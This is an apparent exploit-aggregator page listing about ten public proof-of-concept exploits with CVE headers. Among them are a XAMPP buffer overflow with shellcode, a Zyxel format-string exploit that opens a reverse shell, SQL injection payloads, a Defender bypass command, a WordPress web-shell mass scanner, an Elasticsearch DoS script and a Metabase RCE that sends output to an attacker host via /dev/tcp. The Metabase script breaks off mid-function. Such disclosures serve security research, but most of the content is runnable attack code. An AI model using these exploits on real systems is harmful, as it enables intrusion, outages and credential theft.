evil.com (Intercepted request using Burp proxy) **************************************************************************************************** GET /sisqualIdentityServer/core/login HTTP/2 Host: evil.com Cookie:<cookie> Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Linux" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 **************************************************************************************************** Response **************************************************************************************************** HTTP/2 302 Found Cache-Control: no-store, no-cache, must-revalidate Location: https://evil.com/sisqualIdentityServer/core/ Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Length: 0 **************************************************************************************************** Method of Attack **************************************************************************************************** curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv ****************************************************************************************************
HireHackking

DS Wireless Communication - Remote Code Execution

HACKER · %s · %s

# Exploit Title: DS Wireless Communication Remote Code Execution # Date: 11 Oct 2023 # Exploit Author: MikeIsAStar # Vendor Homepage: https://www.nintendo.com # Version: Unknown # Tested on: Wii # CVE: CVE-2023-45887 """This code will inject arbitrary code into a client's game. You are fully responsible for all activity that occurs while using this code. The author of this code can not be held liable to you or to anyone else as a result of damages caused by the usage of this code. """ import re import sys try: import pydivert except ModuleNotFoundError: sys.exit("The 'pydivert' module is not installed !") # Variables LR_SAVE = b'\x41\x41\x41\x41' assert len(LR_SAVE) == 0x04 PADDING = b'MikeStar' assert len(PADDING) > 0x00 # Constants DWC_MATCH_COMMAND_INVALID = b'\xFE' PADDING_LENGTH = 0x23C FINAL_KEY = b'\\final\\' WINDIVERT_FILTER = 'outbound and tcp and tcp.PayloadLength > 0' def try_modify_payload(payload): message_pattern = rb'\\msg\\GPCM([1-9][0-9]?)vMAT' message = re.search(message_pattern, payload) if not message: return None payload = payload[:message.end()] payload += DWC_MATCH_COMMAND_INVALID payload += (PADDING * (PADDING_LENGTH // len(PADDING) + 1))[:PADDING_LENGTH] payload += LR_SAVE payload += FINAL_KEY return payload def main(): try: with pydivert.WinDivert(WINDIVERT_FILTER) as packet_buffer: for packet in packet_buffer: payload = try_modify_payload(packet.payload) if payload is not None: print('Modified a GPCM message !') packet.payload = payload packet_buffer.send(packet) except KeyboardInterrupt: pass except PermissionError: sys.exit('This program must be run with administrator privileges !') if __name__ == '__main__': main()
HireHackking

XAMPP - Buffer Overflow POC

HACKER · %s · %s

# Exploit Title: XAMPP v3.3.0 — '.ini' Buffer Overflow (Unicode + SEH) # Date: 2023-10-26 # Author: Talson (@Ripp3rdoc) # Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.0.28/xampp-windows-x64-8.0.28-0-VS16-installer.exe # Version: 3.3.0 # Tested on: Windows 11 # CVE-2023-46517 ########################################################## # _________ _______ _ _______ _______ _ # # \__ __/( ___ )( \ ( ____ \( ___ )( ( /| # # ) ( | ( ) || ( | ( \/| ( ) || \ ( | # # | | | (___) || | | (_____ | | | || \ | | # # | | | ___ || | (_____ )| | | || (\ \) | # # | | | ( ) || | ) || | | || | \ | # # | | | ) ( || (____/\/\____) || (___) || ) \ | # # )_( |/ \|(_______/\_______)(_______)|/ )_) # # # ########################################################## # Proof-of-Concept Steps to Reproduce : # 1.- Run the python script "poc.py", it will create a new file "xampp-control.ini" # 2.- Open the application (xampp-control.exe) # 3.- Click on the "admin" button in front of Apache service. # 4.- Profit # Proof-of-Concept code on GitHub: https://github.com/ripp3rdoc/XAMPPv3.3.0-BOF/ # Greetingz to EMU TEAM (¬‿¬)⩙ from pwn import * import shutil import os.path buffer = "\x41" * 268 # 268 bytes to fill the buffer nseh = "\x59\x71" # next SEH address — 0x00590071 (a harmless padding) seh = "\x15\x43" # SEH handler — 0x00430015: pop ecx ; pop ebp ; ret ; padd = "\x71" * 0x55 # padding eax_align = "\x47" # venetian pad/align eax_align += "\x51" # push ecx eax_align += "\x71" # venetian pad/align eax_align += "\x58" # pop eax -> eax = 0019e1a0 eax_align += "\x71" # venetian pad/align eax_align += "\x05\x24\x11" # add eax,0x11002300 eax_align += "\x71" # venetian pad/align eax_align += "\x2d\x11\x11" # sub eax,0x11001100 -> eax = 0019F3DC eax_align += "\x71" # venetian pad/align eax_align += "\x50" # push eax eax_align += "\x71" # pad to align the following ret eax_align += "\xc3"; # ret into eax? # msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_mixed -f raw EXITFUNC=thread BufferRegister=EAX -o shellcode.bin # Payload size: 512 bytes shellcode = ( "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1" "AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBkLzHrbM0ipm0c0bi7u01Ep1TBkb0nPdKR2zlrknrKdDK42Kx" "Jo6WpJnFLqiofLMl1QallBLlO0gQxOzmjagW7rZRObpWBkNrZpdKMzmlBkNlzq1hZC0HKQwab1dKQIKp9qiCrk" "myKhGslzoYtKMdTKkQJ6ma9odlgQ8OJmM1vg08iPD5yfjcSMjXOKQmnDRUhdaH4KR8mTIq7c2FDKjlpKrkaHML" "JaZ3dKItrkYqhPU9MtO4KtOk1KC1QI1JNqKO9P1OOoqJtKn2HkRmOmaZjatMbe7BYpm0kPR0PhmadKRODGioj57" "KgpmMnJZjoxDfceemCmYo9EmlivcL9zE0ikWpQe9ugKoWKcprpo2Jip23KOHUQSaQ0l33Lns5PxrEKPAA" ) shellcode = buffer + nseh + seh + eax_align + padd + shellcode check_file = os.path.isfile("c:\\xampp\\xampp-control.ini") if check_file: print("[!] Backup file found. Generating the POC file...") pass else: # create backup try: shutil.copyfile("c:\\xampp\\xampp-control.ini", "c:\\xampp\\xampp-control.ini.bak") print("[+] Creating backup for xampp-control.ini...") print("[+] Backup file created!") except Exception as e: print("[!] Failed creating a backup for xampp-control.ini: ", e) try: # Create the new file with open("c:\\xampp\\xampp-control.ini", "w", encoding='utf-8') as file: file.write(f"""[Common] Edition= Editor= Browser={shellcode} Debug=0 Debuglevel=0 Language=en TomcatVisible=1 Minimized=0 [LogSettings] Font=Arial FontSize=10 [WindowSettings] Left=-1 Top=-1 Width=682 Height=441 [Autostart] Apache=0 MySQL=0 FileZilla=0 Mercury=0 Tomcat=0 [Checks] CheckRuntimes=1 CheckDefaultPorts=1 [ModuleNames] Apache=Apache MySQL=MySQL Mercury=Mercury Tomcat=Tomcat [EnableModules] Apache=1 MySQL=1 FileZilla=1 Mercury=1 Tomcat=1 [EnableServices] Apache=1 MySQL=1 FileZilla=1 Tomcat=1 [BinaryNames] Apache=httpd.exe MySQL=mysqld.exe FileZilla=filezillaserver.exe FileZillaAdmin=filezilla server interface.exe Mercury=mercury.exe Tomcat=tomcat8.exe [ServiceNames] Apache=Apache2.4 MySQL=mysql FileZilla=FileZillaServer Tomcat=Tomcat [ServicePorts] Apache=80 ApacheSSL=443 MySQL=3306 FileZilla=21 FileZill=14147 Mercury1=25 Mercury2=79 Mercury3=105 Mercury4=106 Mercury5=110 Mercury6=143 Mercury7=2224 TomcatHTTP=8080 TomcatAJP=8009 Tomcat=8005 [UserConfigs] Apache= MySQL= FileZilla= Mercury= Tomcat= [UserLogs] Apache= MySQL= FileZilla= Mercury= Tomcat= """) print("[+] Created the POC!") except Exception as e: print("[!] Failed creating the POC xampp-control.ini: ", e)
HireHackking

Employee Management System v1 - 'email' SQL Injection

HACKER · %s · %s

# Exploit Title: Employee Management System v1 - 'email' SQL Injection # Google Dork: N/A # Application: Employee Management System # Date: 19.02.2024 # Bugs: SQL Injection # Exploit Author: SoSPiro # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html # Version: N/A # Tested on: Windows 10 64 bit Wampserver # CVE : N/A ## Vulnerability Description: In your code, there is a potential SQL injection vulnerability due to directly incorporating user-provided data into the SQL query used for user login. This situation increases the risk of SQL injection attacks where malicious users may input inappropriate data to potentially harm your database or steal sensitive information. ## Proof of Concept (PoC): An example attacker could input the following into the email field instead of a valid email address: In this case, the SQL query would look like: SELECT * FROM users WHERE email='' OR '1'='1' --' AND password = '' AND status = 'Active' As "1=1" is always true, the query would return positive results, allowing the attacker to log in. ## Vulnerable code section: ==================================================== employee/Admin/login.php <?php session_start(); error_reporting(1); include('../connect.php'); //Get website details $sql_website = "select * from website_setting"; $result_website = $conn->query($sql_website); $row_website = mysqli_fetch_array($result_website); if(isset($_POST['btnlogin'])){ //Get Date date_default_timezone_set('Africa/Lagos'); $current_date = date('Y-m-d h:i:s'); $email = $_POST['txtemail']; $password = $_POST['txtpassword']; $status = 'Active'; $sql = "SELECT * FROM users WHERE email='" .$email. "' and password = '".$password."' and status = '".$status."'"; $result = mysqli_query($conn, $sql); if (mysqli_num_rows($result) > 0) { // output data of each row ($row = mysqli_fetch_assoc($result)); $_SESSION["email"] = $row['email']; $_SESSION["password"] = $row['password']; $_SESSION["phone"] = $row['phone']; $firstname = $row['firstname']; $_SESSION["firstname"] = $row['firstname']; $fa = $row['2FA']; }
HireHackking

Microsoft Windows Defender - VBScript Detection Bypass

HACKER · %s · %s

[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_VBSCRIPT_TROJAN_MITIGATION_BYPASS.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows Defender [Vulnerability Type] Windows Defender VBScript Detection Mitigation Bypass TrojanWin32Powessere.G [CVE Reference] N/A [Security Issue] Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail and attackers will typically get an "Access is denied" error message. Previously I have disclosed 3 bypasses using rundll32 javascript, this example leverages VBSCRIPT and ActiveX engine. Running rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0), will typically get blocked by Windows Defender with an "Access is denied" message. Trojan:Win32/Powessere.G Category: Trojan This program is dangerous and executes commands from an attacker. However, you can add arbitrary text for the 2nd mshtml parameter to build off my previous javascript based bypasses to skirt defender detection. Example, adding "shtml", "Lol" or other text and it will execute as of the time of this writing. E.g. C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\PWN\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0) [References] https://twitter.com/hyp3rlinx/status/1759260962761150468 https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txt https://lolbas-project.github.io/lolbas/Binaries/Rundll32/ [Exploit/POC] Open command prompt as Administrator C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0) Access is denied. C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\LoL\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0) We win! [Network Access] Local [Severity] High [Disclosure Timeline] Vendor Notification: February 18, 2024 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
HireHackking

Zyxel zysh - Format string

HACKER · %s · %s

#!/usr/bin/expect -f # # raptor_zysh_fhtagn.exp - zysh format string PoC exploit # Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info> # # "We live on a placid island of ignorance in the midst of black seas of # infinity, and it was not meant that we should voyage far." # -- H. P. Lovecraft, The Call of Cthulhu # # "Multiple improper input validation flaws were identified in some CLI # commands of Zyxel USG/ZyWALL series firmware versions 4.09 through 4.71, # USG FLEX series firmware versions 4.50 through 5.21, ATP series firmware # versions 4.32 through 5.21, VPN series firmware versions 4.30 through # 5.21, NSG series firmware versions 1.00 through 1.33 Patch 4, NXC2500 # firmware version 6.10(AAIG.3) and earlier versions, NAP203 firmware # version 6.25(ABFA.7) and earlier versions, NWA50AX firmware version # 6.25(ABYW.5) and earlier versions, WAC500 firmware version 6.30(ABVS.2) # and earlier versions, and WAX510D firmware version 6.30(ABTF.2) and # earlier versions, that could allow a local authenticated attacker to # cause a buffer overflow or a system crash via a crafted payload." # -- CVE-2022-26531 # # The zysh binary is a restricted shell that implements the command-line # interface (CLI) on multiple Zyxel products. This proof-of-concept exploit # demonstrates how to leverage the format string bugs I have identified in # the "extension" argument of some zysh commands, to execute arbitrary code # and escape the restricted shell environment. # # - This exploit targets the "ping" zysh command. # - It overwrites the .got entry of fork() with the shellcode address. # - The shellcode address is calculated based on a leaked stack address. # - Hardcoded offsets and values might need some tweaking, see comments. # - Automation/weaponization for other targets is left as an exercise. # # For additional details on my bug hunting journey and on the # vulnerabilities themselves, you can refer to the official advisory: # https://github.com/0xdea/advisories/blob/master/HNS-2022-02-zyxel-zysh.txt # # Usage: # raptor@blumenkraft ~ % ./raptor_zysh_fhtagn.exp <REDACTED> admin password # raptor_zysh_fhtagn.exp - zysh format string PoC exploit # Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info> # # Leaked stack address: 0x7fe97170 # Shellcode address: 0x7fe9de40 # Base string length: 46 # Hostile format string: %.18u%1801$n%.169u%1801$hn%.150u%1801$hhn%.95u%1802$hhn # # *** enjoy your shell! *** # # sh-5.1$ uname -snrmp # Linux USG20-VPN 3.10.87-rt80-Cavium-Octeon mips64 Cavium Octeon III V0.2 FPU V0.0 # sh-5.1$ id # uid=10007(admin) gid=10000(operator) groups=10000(operator) # # Tested on: # Zyxel USG20-VPN with Firmware 5.10 # [other appliances/versions are also likely vulnerable] # # change string encoding to 8-bit ASCII to avoid annoying conversion to UTF-8 encoding system iso8859-1 # hostile format string to leak stack address via direct parameter access set offset1 77 set leak [format "AAAA.0x%%%d\$x" $offset1] # offsets to reach addresses in retloc sled via direct parameter access set offset2 1801 set offset3 [expr $offset2 + 1] # difference between leaked stack address and shellcode address set diff 27856 # retloc sled # $ mips64-linux-readelf -a zysh | grep JUMP | grep fork # 112dd558 0000967f R_MIPS_JUMP_SLOT 00000000 fork@GLIBC_2.0 # ^^^^^^^^ << this is the address we need to encode: [112dd558][112dd558][112dd558+2][112dd558+2] set retloc [string repeat "\x11\x2d\xd5\x58\x11\x2d\xd5\x58\x11\x2d\xd5\x5a\x11\x2d\xd5\x5a" 1024] # nop sled # nop-equivalent instruction: xor $t0, $t0, $t0 set nops [string repeat "\x01\x8c\x60\x26" 64] # shellcode # https://github.com/0xdea/shellcode/blob/main/MIPS/mips_n32_msb_linux_revsh.c set sc "\x3c\x0c\x2f\x62\x25\x8c\x69\x6e\xaf\xac\xff\xec\x3c\x0c\x2f\x73\x25\x8c\x68\x68\xaf\xac\xff\xf0\xa3\xa0\xff\xf3\x27\xa4\xff\xec\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x28\x06\xff\xff\x24\x02\x17\xa9\x01\x01\x01\x0c" # padding to align payload in memory (might need adjusting) set padding "AAA" # print header send_user "raptor_zysh_fhtagn.exp - zysh format string PoC exploit\n" send_user "Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info>\n\n" # check command line if { [llength $argv] != 3} { send_error "usage: ./raptor_zysh_fhtagn.exp <host> <user> <pass>\n" exit 1 } # get SSH connection parameters set port "22" set host [lindex $argv 0] set user [lindex $argv 1] set pass [lindex $argv 2] # inject payload via the TERM environment variable set env(TERM) $retloc$nops$sc$padding # connect to target via SSH log_user 0 spawn -noecho ssh -q -o StrictHostKeyChecking=no -p $port $host -l $user expect { -nocase "password*" { send "$pass\r" } default { send_error "error: could not connect to ssh\n" exit 1 } } # leak stack address expect { "Router? $" { send "ping 127.0.0.1 extension $leak\r" } default { send_error "error: could not access zysh prompt\n" exit 1 } } expect { -re "ping: unknown host AAAA\.(0x.*)\r\n" { } default { send_error "error: could not leak stack address\n" exit 1 } } set leaked $expect_out(1,string) send_user "Leaked stack address:\t$leaked\n" # calculate shellcode address set retval [expr $leaked + $diff] set retval [format 0x%x $retval] send_user "Shellcode address:\t$retval\n" # extract each byte of shellcode address set b1 [expr ($retval & 0xff000000) >> 24] set b2 [expr ($retval & 0x00ff0000) >> 16] set b3 [expr ($retval & 0x0000ff00) >> 8] set b4 [expr ($retval & 0x000000ff)] set b1 [format 0x%x $b1] set b2 [format 0x%x $b2] set b3 [format 0x%x $b3] set b4 [format 0x%x $b4] # calculate numeric arguments for the hostile format string set base [string length "/bin/zysudo.suid /bin/ping 127.0.0.1 -n -c 3 "] send_user "Base string length:\t$base\n" set n1 [expr ($b4 - $base) % 0x100] set n2 [expr ($b2 - $b4) % 0x100] set n3 [expr ($b1 - $b2) % 0x100] set n4 [expr ($b3 - $b1) % 0x100] # check for dangerous numeric arguments below 10 if {$n1 < 10} { incr n1 0x100 } if {$n2 < 10} { incr n2 0x100 } if {$n3 < 10} { incr n3 0x100 } if {$n4 < 10} { incr n4 0x100 } # craft the hostile format string set exploit [format "%%.%du%%$offset2\$n%%.%du%%$offset2\$hn%%.%du%%$offset2\$hhn%%.%du%%$offset3\$hhn" $n1 $n2 $n3 $n4] send_user "Hostile format string:\t$exploit\n\n" # uncomment to debug # interact + # exploit target set prompt "(#|\\\$) $" expect { "Router? $" { send "ping 127.0.0.1 extension $exploit\r" } default { send_error "error: could not access zysh prompt\n" exit 1 } } expect { "Router? $" { send_error "error: could not exploit target\n" exit 1 } -re $prompt { send_user "*** enjoy your shell! ***\n" send "\r" interact } default { send_error "error: could not exploit target\n" exit 1 } }
HireHackking

Elasticsearch - StackOverflow DoS

HACKER · %s · %s

# Exploit Author: TOUHAMI KASBAOUI # Vendor Homepage: https://elastic.co/ # Version: 8.5.3 / OpenSearch # Tested on: Ubuntu 20.04 LTS # CVE : CVE-2023-31419 # Ref: https://github.com/sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419 import requests import random import string es_url = 'http://localhost:9200' # Replace with your Elasticsearch server URL index_name = '*' payload = "/*" * 10000 + "\\" +"'" * 999 verify_ssl = False username = 'elastic' password = 'changeme' auth = (username, password) num_queries = 100 for _ in range(num_queries): symbols = ''.join(random.choice(string.ascii_letters + string.digits + '^') for _ in range(5000)) search_query = { "query": { "match": { "message": (symbols * 9000) + payload } } } print(f"Query {_ + 1} - Search Query:") search_endpoint = f'{es_url}/{index_name}/_search' response = requests.get(search_endpoint, json=search_query, verify=verify_ssl, auth=auth) if response.status_code == 200: search_results = response.json() print(f"Query {_ + 1} - Response:") print(search_results) total_hits = search_results['hits']['total']['value'] print(f"Query {_ + 1}: Total hits: {total_hits}") for hit in search_results['hits']['hits']: source_data = hit['_source'] print("Payload result: {search_results}") else: print(f"Error for query {_ + 1}: {response.status_code} - {response.text}")
HireHackking

Wordpress Seotheme - Remote Code Execution Unauthenticated

HACKER · %s · %s

# Exploit Title: Wordpress Seotheme - Remote Code Execution Unauthenticated # Date: 2023-09-20 # Author: Milad Karimi (Ex3ptionaL) # Category : webapps # Tested on: windows 10 , firefox import sys , requests, re from multiprocessing.dummy import Pool from colorama import Fore from colorama import init init(autoreset=True) fr  =   Fore.RED fc  =   Fore.CYAN fw  =   Fore.WHITE fg  =   Fore.GREEN fm  =   Fore.MAGENTA shell = """<?php echo "EX"; echo "<br>".php_uname()."<br>"; echo "<form method='post' enctype='multipart/form-data'> <input type='file' name='zb'><input type='submit' name='upload' value='upload'></form>"; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to Upload."; } } ?>""" requests.urllib3.disable_warnings() headers = {'Connection': 'keep-alive',             'Cache-Control': 'max-age=0',             'Upgrade-Insecure-Requests': '1',             'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36',             'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',             'Accept-Encoding': 'gzip, deflate',             'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',             'referer': 'www.google.com'} try:     target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()] except IndexError:     path = str(sys.argv[0]).split('\\')     exit('\n  [!] Enter <' + path[len(path) - 1] + '> <sites.txt>') def URLdomain(site):     if site.startswith("http://") :         site = site.replace("http://","")     elif site.startswith("https://") :         site = site.replace("https://","")     else :         pass     pattern = re.compile('(.*)/')     while re.findall(pattern,site):         sitez = re.findall(pattern,site)         site = sitez[0]     return site def FourHundredThree(url):     try:         url = 'http://' + URLdomain(url)         check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,timeout=15)         if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:                 print ' -| ' + url + ' --> {}[Succefully]'.format(fg)                 open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n')         else:             url = 'https://' + URLdomain(url)             check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15)             if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:                     print ' -| ' + url + ' --> {}[Succefully]'.format(fg)                     open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n')             else:                 print ' -| ' + url + ' --> {}[Failed]'.format(fr)                 url = 'http://' + URLdomain(url)         check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,timeout=15)         if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:                 print ' -| ' + url + ' --> {}[Succefully]'.format(fg)                 open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n')         else:             url = 'https://' + URLdomain(url)             check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15)             if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:                     print ' -| ' + url + ' --> {}[Succefully]'.format(fg)                     open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n')             else:                 print ' -| ' + url + ' --> {}[Failed]'.format(fr)     except :         print ' -| ' + url + ' --> {}[Failed]'.format(fr) mp = Pool(100) mp.map(FourHundredThree, target) mp.close() mp.join() print '\n [!] {}Saved in Shells.txt'.format(fc)
HireHackking

Online Nurse Hiring System 1.0 - Time-Based SQL Injection

HACKER · %s · %s

# Exploit Title: Online Nurse Hiring System 1.0 - 'bookid' Time-Based SQL Injection # Date: 03/10/2023 # Exploit Author: Alperen Yozgat # Vendor Homepage: https://phpgurukul.com/online-nurse-hiring-system-using-php-and-mysql # Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=17826 # Version: 1.0 # Tested On: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30 ## Description ## On the book-nurse.php page, the bookid parameter is vulnerable to SQL Injection vulnerability. ## Proof of Concept ## # After sending the payload, the response time will increase to at least 5 seconds. # Payload: 1'+AND+(SELECT+2667+FROM+(SELECT(SLEEP(5)))RHGJ)+AND+'vljY'%3d'vljY POST /onhs/book-nurse.php?bookid=1'+AND+(SELECT+2667+FROM+(SELECT(SLEEP(5)))RHGJ)+AND+'vljY'%3d'vljY HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 140 Cookie: PHPSESSID=0ab508c4aa5fdb6c55abb909e5cbce09 contactname=test&contphonenum=1111111&contemail=test%40test.com&fromdate=2023-10-11&todate=2023-10-18&timeduration=1&patientdesc=3&submit=
HireHackking
# Exploit Title: ManageEngine ADManager Plus Build < 7183 - Recovery Password Disclosure # Exploit Author: Metin Yunus Kandemir # Vendor Homepage: https://www.manageengine.com/ # Software Link: https://www.manageengine.com/products/ad-manager/ # Details: https://docs.unsafe-inline.com/0day/manageengine-admanager-plus-build-less-than-7183-recovery-password-disclosure-cve-2023-31492 # Details: https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/admanager-recovery-password-disclosure.md # Version: ADManager Plus Build < 7183 # Tested against: Build 7180 # CVE: CVE-2023-31492 import argparse import requests import urllib3 import sys """ The Recovery Settings helps you configure the restore and recycle options pertaining to the objects in the domain you wish to recover. When deleted user accounts are restored, defined password is set to the user accounts. Helpdesk technician that has not privilege for backup/recovery operations can view the password and then compromise restored user accounts conducting password spraying attack in the Active Directory environment. """ urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def getPass(target, auth, user, password): with requests.Session() as s: if auth.lower() == 'admanager': auth = 'ADManager Plus Authentication' data = { "is_admp_pass_encrypted": "false", "j_username": user, "j_password": password, "domainName": auth, "AUTHRULE_NAME": "ADAuthenticator" } # Login url = target + 'j_security_check?LogoutFromSSO=true' headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "Content-Type": "application/x-www-form-urlencoded" } req = s.post(url, data=data, headers=headers, allow_redirects=True, verify=False) if 'Cookie' in req.request.headers: print('[+] Authentication successful!') elif req.status_code == 200: print('[-] Invalid login name/password!') sys.exit(0) else: print('[-] Something went wrong!') sys.exit(1) # Fetching recovery password for i in range(1, 6): print('[*] Trying to fetch recovery password for domainId: %s !' % i) passUrl = target + 'ConfigureRecoverySettings/GET_PASS?req=%7B%22domainId%22%3A%22' + str(i) + '%22%7D' passReq = s.get(passUrl, headers=headers, allow_redirects=False, verify=False) if passReq.content: print(passReq.content) def main(): arg = get_args() target = arg.target auth = arg.auth user = arg.user password = arg.password getPass(target, auth, user, password) def get_args(): parser = argparse.ArgumentParser( epilog="Example: exploit.py -t https://target/ -a unsafe.local -u operator1 -p operator1") parser.add_argument('-t', '--target', required=True, action='store', help='Target url') parser.add_argument('-a', '--auth', required=True, action='store', help='If you have credentials of the application user, type admanager. If you have credentials of the domain user, type domain DNS name of the target domain.') parser.add_argument('-u', '--user', required=True, action='store') parser.add_argument('-p', '--password', required=True, action='store') args = parser.parse_args() return args main()
HireHackking

Metabase 0.46.6 - Pre-Auth Remote Code Execution

HACKER · %s · %s

# Exploit Title: metabase 0.46.6 - Pre-Auth Remote Code Execution # Google Dork: N/A # Date: 13-10-2023 # Exploit Author: Musyoka Ian # Vendor Homepage: https://www.metabase.com/ # Software Link: https://www.metabase.com/ # Version: metabase 0.46.6 # Tested on: Ubuntu 22.04, metabase 0.46.6 # CVE : CVE-2023-38646 #!/usr/bin/env python3 import socket from http.server import HTTPServer, BaseHTTPRequestHandler from typing import Any import requests from socketserver import ThreadingMixIn import threading import sys import argparse from termcolor import colored from cmd import Cmd import re from base64 import b64decode class Termial(Cmd): prompt = "metabase_shell > " def default(self,args): shell(args) class Handler(BaseHTTPRequestHandler): def do_GET(self): global success if self.path == "/exploitable": self.send_response(200) self.end_headers() self.wfile.write(f"#!/bin/bash\n$@ | base64 -w 0 > /dev/tcp/{argument.lhost}/{argument.lport}".encode()) success = True else: print(self.path) #sys.exit(1) def log_message(self, format: str, *args: Any) -> None: return None class Server(HTTPServer): pass def run(): global httpserver httpserver = Server(("0.0.0.0", argument.sport), Handler) httpserver.serve_forever() def exploit(): global success, setup_token print(colored("[*] Retriving setup token", "green")) setuptoken_request = requests.get(f"{argument.url}/api/session/properties") setup_token = re.search('"setup-token":"(.*?)"', setuptoken_request.text, re.DOTALL).group(1) print(colored(f"[+] Setup token: {setup_token}", "green")) print(colored("[*] Tesing if metabase is vulnerable", "green")) payload = { "token": setup_token, "details": { "is_on_demand": False, "is_full_sync": False, "is_sample": False, "cache_ttl": None, "refingerprint": False, "auto_run_queries": True, "schedules": {}, "details": { "db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('http://{argument.lhost}:{argument.sport}/exploitable').openConnection().getContentLength()\n$$--=x\\;", "advanced-options": False, "ssl": True }, "name": "an-sec-research-musyoka", "engine": "h2" } } timer = 0 print(colored(f"[+] Starting http server on port {argument.sport}", "blue")) thread = threading.Thread(target=run, ) thread.start() while timer != 120: test = requests.post(f"{argument.url}/api/setup/validate", json=payload) if success == True : print(colored("[+] Metabase version seems exploitable", "green")) break elif timer == 120: print(colored("[-] Service does not seem exploitable exiting ......", "red")) sys.exit(1) print(colored("[+] Exploiting the server", "red")) terminal = Termial() terminal.cmdloop() def shell(command): global setup_token, payload2 